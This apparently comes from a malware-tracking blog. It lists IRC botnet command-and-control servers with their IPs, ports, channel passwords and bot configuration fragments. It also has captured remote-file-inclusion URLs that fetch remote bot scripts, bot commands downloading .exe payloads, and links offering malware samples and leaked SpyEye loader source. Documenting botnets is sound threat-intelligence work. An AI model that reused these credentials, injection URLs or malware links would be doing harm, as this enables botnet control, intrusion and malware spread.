Resolved : [devilz.com.mx] To [200.63.45.21] gorditabonita.sytes.net 7171 Remote Host Port Number 200.63.45.21 7171 PASS none NICK [2947|USA|XP|Z3R0x] USER 2947 “” “lol” :2947 JOIN #USB2 gorda01 PONG :irc.puta.org hosting infos: http://whois.domaintools.com/200.63.45.21
45mb malware samples
Another package with diferent malwares like spyeye samples,ransomwares,irc bots etc have fun Download: http://adf.ly/2KF81
220.227.154.11(irc botnet hosted in India Navi Mumbai Rcom-static-dia)
Remote Host Port Number 220.227.154.11 3121 PASS google_cache2.tmp NICK new[iRooT-XP-USA]546915 USER 5469 “” “TsGh” :5469 JOIN #scan# hosting infos: http://whois.domaintools.com/220.227.154.11
irc.tux-family.com(linux bots hosted in United States Dallas Theplanet.com Internet Services Inc)
var $config = array(“server”=>”207.44.182.29”, “port”=>”6667”, “pass”=>””, “prefix”=>”[BOTNET]”, “maxrand”=>”6”, “chan”=>”#theowners”, “chan2″=>”#”, “key”=>””, “modes”=>”+p”, “password”=>”jorge”, “trigger”=>”.”, “hostauth”=>”*” var $config = array(“server”=>”207.44.182.29”, “port”=>”6667”, “pass”=>””, “prefix”=>”botnet”, “maxrand”=>”6”, “chan”=>”#haxixe”, “chan2″=>”#”, “key”=>”*”, “modes”=>”+p-ix”, “password”=>”Maconha”, “trigger”=>”.”, “hostauth”=>”*” Now talking in # ([botnet304407) [uname!]: Linux s227.xrea.com 2.4.32 #5 Tue Feb 14 01:43:10 JST 2006 i686 (safe: on) ([botnet304407) [vuln!]: http://www.agua-japan.com/renheren/modules/xfsection//modify.php?dir_module=http://haxixe.t35.com/tbot.txt? ([botnet752802) [uname!]: LinuxRead more...
SpyEye 1.3.45 owned Loader source included
SpyEye got pwned by Xylitol a jung french reverser here u have the source of Loader for SpyEye 1.3.45 Download Download Download i m not including executables because this is not made for helping lamers using spyeye learn from the source that’s all
208.117.34.101(ngrBot hosted in United States Laird Hill Steadfast Networks)
Remote Host Port Number 199.15.234.7 80 74.117.178.7 80 208.117.34.101 1888 PASS ngrBot PRIVMSG #XP :[d=”http://dc230.4shared.com/download/BAHlq0z5/refdf.exe” s=”81920 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.exe” – Download retries: 0 NICK n{US|XPa}olgmwse USER olgmwse 0 0 :olgmwse JOIN ##center 1963.g3rb3rs1t0.3691 JOIN #XP JOIN #new JOIN #US hosting infos: http://whois.domaintools.com/208.117.34.101
200.107.255.114(irc bot hosted in Ecuador Lutrol S.a)
Remote Host Port Number 174.121.14.164 80 174.36.56.201 80 188.40.87.249 80 195.210.28.38 80 195.250.147.177 80 204.2.197.201 80 208.94.1.214 80 209.17.74.144 80 66.115.184.85 80 66.115.184.87 80 200.107.255.114 4244 ircd here PASS google_cache2.tmp 74.125.157.120 443 NICK new[iRooT-XP-USA]338226 USER 3382 “” “TsGh” :3382 JOIN #!N!# WTF PRIVMSG #!N!# :http://kajmak1.bloger.hr Has Been Visited! hosting infos: http://whois.domaintools.com/200.107.255.114
erofolio.no-ip.biz(Ganja bot hosted in United States Greenville Gsp Adsl Cbb)
Remote Host Port Number 184.168.48.1 80 74.177.79.142 6667 NICK [00|USA|XP|SP2]-2865 USER tufzv 0 0 :[00|USA|XP|SP2]-2865 USERHOST [00|USA|XP|SP2]-2865 MODE [00|USA|XP|SP2]-2865 -i JOIN #exe PRIVMSG #exe :-=MAIN=- Downloading update from: http://www.bloodyearlobesmusic.com/css/eFUD.exe PONG :55B3DFD6 Nick: New[GaNjA-XP-AUT]141568 Username: 8829 Joined Channel: #spiffy 46.105.241.160:6667 Nick: New{FR-XP-x86}5276416 Username: 5276416 Server Pass: secret Joined Channel: #justin with Password secret * The dataRead more...
gangbang.mytijn.org(linux bots hosted in India Noida Net4india Ltd)
$servidor = ‘gangbang.mytijn.org’ unless $servidor; my $porta = ‘25343’; my @adms = (“Ha45K”); my @canais = (“#e109#”); Resolved : [gangbang.mytijn.org] To [117.211.84.155] Resolved : [gangbang.mytijn.org] To [76.10.213.195] Resolved : [gangbang.mytijn.org] To [113.30.137.146] var $config = array(“server”=>”gangbang.mytijn.org”, “port”=>”23232”, “pass”=>””, “maxrand”=>”1”, “chan”=>”#wWw#”, “chan2″=>”#wWw#”, “key”=>”scan”, “modes”=>”+p”, “password”=>”41aa15390e2efa34ac693c3bd7cb8e88”, “trigger”=>”.”, “hostauth”=>”0wn3d.3u”); my $injector = “http://www.m-crystal.kz/backup/pbot.txt?”; my $botshell = “http://outdoorbg.com/e107_files/public/sh.txt?”; myRead more...
evrcrew.serveirc.com(plague bot hosted in India New Delhi Navatha Road Transport)
DNS : evrcrew.serveirc.com IP : 210.212.222.229 Port:6667 Nick: PLAGUE|7083101 Username: sxetpzexk Joined Channel: #ddos-hack with Password tuculoroto hosting infos: http://whois.domaintools.com/210.212.222.229